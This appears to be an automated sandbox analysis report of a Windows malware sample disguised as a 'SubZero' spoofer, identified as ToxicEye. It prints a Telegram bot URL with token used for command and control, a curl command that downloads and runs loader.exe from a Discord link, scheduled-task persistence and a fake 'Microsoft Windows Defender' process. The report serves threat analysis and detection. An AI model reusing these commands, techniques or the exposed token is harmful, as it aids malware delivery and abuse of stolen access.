Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 01:02
Behavioral task
behavioral1
Sample
52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
Resource
win7-20231215-en
General
-
Target
52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
-
Size
14.6MB
-
MD5
cef5534159555f0df0b6e85715c19208
-
SHA1
b1d4a0ccf69b20ba3114696e6d7c126089080325
-
SHA256
52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6
-
SHA512
2c3e75871fd59db084747c078fa92050cb5ee3a47a307730f57cada79ae5ba00e037ffe8508e834eb4630d8f8cf1e8b5d50b88ae7027f66f55033ac92a511460
-
SSDEEP
393216:+SL+9qz88Ck+7q3p91JmBqfKV6egI7w13CT6Ztw6:+++9q4G331UofXeRw13CT6
Malware Config
Extracted
toxiceye
https://api.telegram.org/bot6782288559:AAGGaNp1iJda_iae5clmNAjmS8bZxRP8kMY/sendMessage?chat_id=6117387875
Signatures
-
Executes dropped EXE 8 IoCs
Processes:
DRIVER.EXEPROTECTION.EXESUBZERO.EXESUBZEROFN UPDATED SPOOFER.EXEPROTECTION.EXEWindowsInput.exeMicrosoft Windows Defender.exePERMENANTSPOOFER.exepid process 2056 DRIVER.EXE 2200 PROTECTION.EXE 2880 SUBZERO.EXE 2964 SUBZEROFN UPDATED SPOOFER.EXE 2752 PROTECTION.EXE 1648 WindowsInput.exe 2760 Microsoft Windows Defender.exe 1916 PERMENANTSPOOFER.exe -
Loads dropped DLL 17 IoCs
Processes:
52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exePROTECTION.EXEPROTECTION.EXESUBZEROFN UPDATED SPOOFER.EXEpid process 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe 2728 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe 2200 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2752 PROTECTION.EXE 2964 SUBZEROFN UPDATED SPOOFER.EXE 2964 SUBZEROFN UPDATED SPOOFER.EXE 1204 1204 -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll upx behavioral1/memory/2752-111-0x000007FEEF960000-0x000007FEF0038000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 wtfismyip.com 4 wtfismyip.com -
Drops file in System32 directory 3 IoCs
Processes:
WindowsInput.exeSUBZEROFN UPDATED SPOOFER.EXEdescription ioc process File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File created C:\Windows\SysWOW64\WindowsInput.exe SUBZEROFN UPDATED SPOOFER.EXE File opened for modification C:\Windows\SysWOW64\WindowsInput.InstallLog WindowsInput.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 852 schtasks.exe 2016 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 472 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Processes:
SUBZERO.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde SUBZERO.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 SUBZERO.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
PERMENANTSPOOFER.exepid process 1916 PERMENANTSPOOFER.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes:
Microsoft Windows Defender.exePERMENANTSPOOFER.exepid process 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 1916 PERMENANTSPOOFER.exe 1916 PERMENANTSPOOFER.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe 2760 Microsoft Windows Defender.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Microsoft Windows Defender.exepid process 2760 Microsoft Windows Defender.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
DRIVER.EXEtasklist.exeMicrosoft Windows Defender.exePERMENANTSPOOFER.exedescription pid process Token: SeDebugPrivilege 2056 DRIVER.EXE Token: SeDebugPrivilege 2624 tasklist.exe Token: SeDebugPrivilege 2760 Microsoft Windows Defender.exe Token: SeDebugPrivilege 1916 PERMENANTSPOOFER.exe Token: SeDebugPrivilege 1916 PERMENANTSPOOFER.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Microsoft Windows Defender.exePERMENANTSPOOFER.exepid process 2760 Microsoft Windows Defender.exe 1916 PERMENANTSPOOFER.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exePROTECTION.EXESUBZEROFN UPDATED SPOOFER.EXEDRIVER.EXEcmd.exePERMENANTSPOOFER.exeSUBZERO.EXEcmd.exedescription pid process target process PID 1684 wrote to memory of 2056 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe DRIVER.EXE PID 1684 wrote to memory of 2056 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe DRIVER.EXE PID 1684 wrote to memory of 2056 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe DRIVER.EXE PID 1684 wrote to memory of 2056 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe DRIVER.EXE PID 1684 wrote to memory of 2200 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe PROTECTION.EXE PID 1684 wrote to memory of 2200 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe PROTECTION.EXE PID 1684 wrote to memory of 2200 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe PROTECTION.EXE PID 1684 wrote to memory of 2200 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe PROTECTION.EXE PID 1684 wrote to memory of 2880 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZERO.EXE PID 1684 wrote to memory of 2880 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZERO.EXE PID 1684 wrote to memory of 2880 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZERO.EXE PID 1684 wrote to memory of 2880 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZERO.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 1684 wrote to memory of 2964 1684 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe SUBZEROFN UPDATED SPOOFER.EXE PID 2200 wrote to memory of 2752 2200 PROTECTION.EXE PROTECTION.EXE PID 2200 wrote to memory of 2752 2200 PROTECTION.EXE PROTECTION.EXE PID 2200 wrote to memory of 2752 2200 PROTECTION.EXE PROTECTION.EXE PID 2964 wrote to memory of 1648 2964 SUBZEROFN UPDATED SPOOFER.EXE WindowsInput.exe PID 2964 wrote to memory of 1648 2964 SUBZEROFN UPDATED SPOOFER.EXE WindowsInput.exe PID 2964 wrote to memory of 1648 2964 SUBZEROFN UPDATED SPOOFER.EXE WindowsInput.exe PID 2964 wrote to memory of 1648 2964 SUBZEROFN UPDATED SPOOFER.EXE WindowsInput.exe PID 2056 wrote to memory of 852 2056 DRIVER.EXE schtasks.exe PID 2056 wrote to memory of 852 2056 DRIVER.EXE schtasks.exe PID 2056 wrote to memory of 852 2056 DRIVER.EXE schtasks.exe PID 2056 wrote to memory of 2248 2056 DRIVER.EXE cmd.exe PID 2056 wrote to memory of 2248 2056 DRIVER.EXE cmd.exe PID 2056 wrote to memory of 2248 2056 DRIVER.EXE cmd.exe PID 2248 wrote to memory of 2624 2248 cmd.exe tasklist.exe PID 2248 wrote to memory of 2624 2248 cmd.exe tasklist.exe PID 2248 wrote to memory of 2624 2248 cmd.exe tasklist.exe PID 2248 wrote to memory of 2440 2248 cmd.exe find.exe PID 2248 wrote to memory of 2440 2248 cmd.exe find.exe PID 2248 wrote to memory of 2440 2248 cmd.exe find.exe PID 2248 wrote to memory of 472 2248 cmd.exe timeout.exe PID 2248 wrote to memory of 472 2248 cmd.exe timeout.exe PID 2248 wrote to memory of 472 2248 cmd.exe timeout.exe PID 2964 wrote to memory of 2760 2964 SUBZEROFN UPDATED SPOOFER.EXE Microsoft Windows Defender.exe PID 2964 wrote to memory of 2760 2964 SUBZEROFN UPDATED SPOOFER.EXE Microsoft Windows Defender.exe PID 2964 wrote to memory of 2760 2964 SUBZEROFN UPDATED SPOOFER.EXE Microsoft Windows Defender.exe PID 2964 wrote to memory of 2760 2964 SUBZEROFN UPDATED SPOOFER.EXE Microsoft Windows Defender.exe PID 2248 wrote to memory of 1916 2248 cmd.exe PERMENANTSPOOFER.exe PID 2248 wrote to memory of 1916 2248 cmd.exe PERMENANTSPOOFER.exe PID 2248 wrote to memory of 1916 2248 cmd.exe PERMENANTSPOOFER.exe PID 1916 wrote to memory of 2016 1916 PERMENANTSPOOFER.exe schtasks.exe PID 1916 wrote to memory of 2016 1916 PERMENANTSPOOFER.exe schtasks.exe PID 1916 wrote to memory of 2016 1916 PERMENANTSPOOFER.exe schtasks.exe PID 1916 wrote to memory of 608 1916 PERMENANTSPOOFER.exe WerFault.exe PID 1916 wrote to memory of 608 1916 PERMENANTSPOOFER.exe WerFault.exe PID 1916 wrote to memory of 608 1916 PERMENANTSPOOFER.exe WerFault.exe PID 2880 wrote to memory of 2296 2880 SUBZERO.EXE cmd.exe PID 2880 wrote to memory of 2296 2880 SUBZERO.EXE cmd.exe PID 2880 wrote to memory of 2296 2880 SUBZERO.EXE cmd.exe PID 2296 wrote to memory of 2264 2296 cmd.exe certutil.exe PID 2296 wrote to memory of 2264 2296 cmd.exe certutil.exe PID 2296 wrote to memory of 2264 2296 cmd.exe certutil.exe PID 2296 wrote to memory of 1612 2296 cmd.exe find.exe PID 2296 wrote to memory of 1612 2296 cmd.exe find.exe PID 2296 wrote to memory of 1612 2296 cmd.exe find.exe PID 2296 wrote to memory of 1616 2296 cmd.exe find.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe"C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE"C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"3⤵
- Creates scheduled task(s)
PID:852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp20E9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp20E9.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\SubZ\PERMENANTSPOOFER.exe"PERMENANTSPOOFER.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"5⤵
- Creates scheduled task(s)
PID:2016
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1916 -s 14245⤵PID:608
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE"C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5 | find /i /v "md5" | find /i /v "certutil"3⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\system32\find.exefind /i /v "certutil"4⤵PID:1616
-
-
C:\Windows\system32\find.exefind /i /v "md5"4⤵PID:1612
-
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD54⤵PID:2264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1196977210687488151/1197232221279485992/loader.exe -o NewVersion.exe --silent3⤵PID:2204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NewVersion.exe3⤵PID:2376
-
-
-
C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE"C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2760
-
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1648
-
-
-
C:\Windows\system32\find.exefind ":"1⤵PID:2440
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2056"1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak1⤵
- Delays execution with timeout.exe
PID:472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
181KB
MD5e5a5b93a753960a93abee53ea27d594c
SHA1cbd583d7ab69074db569b46136828d698bd41a3a
SHA256886c08f448a5fcb27e9626b9d6efa0fdef1c3d7dbe7e9e0d7fcfa39fdb6637dd
SHA5128374200ceaa534f1fe8061f5f54afeac646300393e1ee9ae2a309621d3de3b22b1ef17d561bce4f96fcc9c059deabbf1db164b8a2c43084a77dc3c2f88ea6759
-
Filesize
28KB
MD585649e5ee9c7b64a20c4feb4bae2d6f8
SHA17377cc11931d35a5891b0dada6ae3231016c2c2b
SHA25643cb35b4235f75034d3aa37e101919970c7caa4487ab4161a0c93dcdecb40151
SHA5123050cf7ff616628894ff0a65fa285eabc7585e303945ee1d5b041c8a4d9da14ba40a833858cbbe8f847a830d9ab9bdc27a0342ff1776ee9b3b6ffb0a3310df3c
-
Filesize
109KB
MD5a234ee7154ebb81ddd9f16e69f346fb7
SHA198b8384b8c499af5ec89903b04e0b43d4238ba81
SHA256e39f17b345a5a323d6468e1292243e89622bc944cada7a751970cdb1535e6250
SHA51282543549d99672c7b463387e067593722d46a7168fc628446125abe6a659662c917ed753a68e15242e2e71a036c6f65e0b5261b0b05e9a96b26f87b819c2f9eb
-
Filesize
80KB
MD54c3ab4b8c981fbef2aeb63008151a384
SHA10fb90022a643a4ee113af5e030fb5676857292d6
SHA256477f8c264eba1de242b134281b7cfcaf2e5488de7e8289a31fdbdce0983508ef
SHA512a63429a0e3631175ebf6314079c4ebf26ef3cdc7c77bec0a3a7d13bd15ef3b1d3dbd570c566e75ee8af3b4ed67421fcda87d0986a68aa925875e63268e50ba92
-
Filesize
228KB
MD5c0ce61f8945f583202ebcc402d6d64eb
SHA141f53f513183844fc3eac467e133f120fe16aef1
SHA256c676f3116c1d647cee88eeed9588d31ec931a014c6b8fd99c225f311341ab93d
SHA5126d821e53a4f6c4b1063cdbedd400c4173c894b1e113d1f25c04f94a810da35d75c300e13060260353c5d8439cf156fb2fba3e9f97a261aeba739a118d008f2d5
-
Filesize
146KB
MD5d908cf1f4097e146f15694476de33aef
SHA1af4690c7b06486afe9b101184e8a2dea14335ed7
SHA256c24e13b84a2be48bcffe793f5844192ff8334fa9e844cb348090ca7bb4ef24a5
SHA51260eb10d304432ce1c9328aca144092e5f3ccabbe4ef721b9f72b96da3aa28c0612b913bac8b821d77b4985548330b79d271f015c8fd4595c5869195e0548f29e
-
Filesize
153KB
MD55524053ac84c01a0c0a39152f96731e5
SHA17001720cb7e2baaf6a41e09cbdb7aebaf0187805
SHA2561c4da6ce98365a91122ed563d3e88646abcf72d86d887bc92cdb88380406a229
SHA512507fcc49c312f48180f08e4e38a21353bca96e88e34e98056c1dd2e9da52476db7e924212c73b694954e85d3ec76f5d2a029fa1cb0bf85d6044bf904d6a52eea
-
Filesize
21KB
MD54380d56a3b83ca19ea269747c9b8302b
SHA10c4427f6f0f367d180d37fc10ecbe6534ef6469c
SHA256a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a
SHA5121c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4
-
Filesize
21KB
MD52554060f26e548a089cab427990aacdf
SHA18cc7a44a16d6b0a6b7ed444e68990ff296d712fe
SHA2565ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044
SHA512fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506
-
Filesize
89KB
MD57ad2863749bd506cbb2285c933991ed9
SHA19a47fffb0d77c8cfeb972fd14452ecb03446b7bb
SHA2566c9d074756a98729440bc8f2d722ac4a7b23d6fc8a5d207906f26055d5c80f5b
SHA512eafdd2bb0dd9679ae2aa601c7997fd79245a5e34303bc2456e957170dc6288d6c6da4f954566809f503e066bf8442881d187ba2a57c97ce6819eef1f3ff4957b
-
Filesize
78KB
MD541a047efe0451940b95db8d31fe527b9
SHA13e53f7978fe3cd57f7091972c78ee46a4906d9e6
SHA256e20c6ce4b3a4a6aa9bbacd95acfc09cfd7d5e41faf5810123768839a8e7caf3c
SHA51299ae8a28eefe8f235024611029777aa50d94718aa6a89adc1691b87b3734407e330068f1dd2154eafd0d398c1fc81e0aa8b1221135fce05d2faaf5cc35976e91
-
Filesize
192B
MD5584591711cdf59b381d605be34fce2fb
SHA1e2e85e505eaa04052c5a864d9b31e4c788419841
SHA2564e8cc6e83a9ec828e20c4c55f11a4e8cf3cd1e08e8df2eb3c72e8892ef836c83
SHA51255e794671d83fd7d50410d3a288a03964b3f04485b7ed50a7ace0b2d308b4032e566a401f32737e2e69a95625d8dd8786726b75a8647345767e0cf14510840bd
-
Filesize
77KB
MD5765808adc048ea7a891bf71d73d9b3bb
SHA1c4e2a94816edceb365da088aa5c30b112021550d
SHA256fedca191727b023176c088537731a003d4fda6c5e38d5cf4760d0c578d09b1a2
SHA512bec891d7a794518b2452c665a88cbf1627feaf0dac97a6385010e1bdbf40fd727bd301e9713f4e436bee5eb7d71cfecf65016aebef4c8d41b6730263cbb562e8
-
Filesize
120KB
MD58af7f489539a93f557ebdd5434c02a6b
SHA141770c775c7ce85f2e6787ad55d064e23d20986d
SHA256ae406cb2ae5a4946f6b95d3a5ac3f86f343a63c54f5410138a529ee5eb097616
SHA5120a07d0cf94bda2334f76b0b345229209519dd4da004f012005d5a3d8272b4373c6cbf1061d4fdf8e6cc26130fa8ee7d7073a742a77d2fa17dd5c5063f060f8b7
-
Filesize
174KB
MD5acd304edd8a12657d85c63de1fb7ab50
SHA19fa885f71bdbd10765140f664244d59e9281027c
SHA256c48b0f77cbd408ae3e167bb2945e9fb44d47502acab7c8f1a05effc2dd4d643c
SHA51272f97e3b0aed86fffcaa04db2e0ad0a11581ae19db9463ff6365d5a22184064f4be1c7bba1506e6d8308f854bb8f0f4560a866183ee4c2cbfea8a3ce6de8a4a8
-
Filesize
11KB
MD58de88d013af176f722fbffcf10129d70
SHA1296d9e24e1bbad2100d243aaf7a5de48eb07771d
SHA25669b3590ff99b73d630e9f35d6d60fcbe7d206b6152cbc94422f5144a726b370e
SHA51206ed7381329e5617ae0e78df86d219286a9744cf140dcc3d0a87a52f6ec7d846d8be6336df3e0041128f8af81d6953b170b8b5c4b72966c8795d0e06f6954851
-
Filesize
56KB
MD5ff6e403559c2cb8ad49f71257fb35561
SHA1e1537ff323012130e9d3e68baafa1b78c93caf20
SHA256ba50f9399f9f06c341c89e0f0863084e2c11ce82e079edf089df7d3eff022e15
SHA5124038e15ca639279cb366ca198c4bfe7a19794a87eb8c80f2c2d712290700d3e6e7a6a000080de070d4470c9485efbf8ec1b5528066319ed456d5526ad7b7dadb
-
Filesize
224B
MD5e469dda91ae810a1f94c96060f3f8a65
SHA10b4b3b0f6f937016b1e045ce5313ee2a65a38630
SHA256d42fee8db8eb0e047ca53ad59b1c9bc69fe04993be36fec502e3532371908842
SHA5122eb4037361c03e195c642a53f55a3182a6df19903db503060e366f2394750e64ae04fdaace61ef5a6dba649defc88322d78edd2928bc53ebd1ce11d68cc88dac
-
Filesize
597B
MD5c2291863df7c2d3038ce3c22fa276506
SHA17b7d2bc07a6c35523807342c747c9b6a19f3184e
SHA25614504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da
SHA51200bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa
-
Filesize
20KB
MD50f546756a281e74813b1991bbe0df5d5
SHA13fc5246f7b1cd213be65ba0fc17186f5484d59b1
SHA256a36ea1ffaa0cc50401f068ee142d3470ca8ae54986d02e108bf6bccb3ed097b4
SHA512b6ea2b9941faa60ec150782cd8ca020d973a8ccddfa551049c0f6954e32ff9000290e7e0b1ba4a6a5235a8b4d8239c8eba49f3c5fc9ea9e7e17243d86dc58b27
-
Filesize
21KB
MD5e854a4636afc652b320e12e50ba4080e
SHA18a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc
SHA25694b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5
SHA51230aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118
-
Filesize
111KB
MD551ae04a1f94c43bc3cdbe57ab789b955
SHA1c73cd0cc75fd0ad05d6ac2c2651899ae47fd2c0c
SHA2568e539cc20073dd335eb195c56dae58c43e69b813a984f2fa76421a0880da5c1d
SHA512e566e3ad4bc43e46fb005458c68472627fd9b2dca5c69808017203519b22d7991cdc90d4e2ca7d3f7f57c1b52188959cda1109300bfb79875ee5a1f5b477a8ee
-
Filesize
196KB
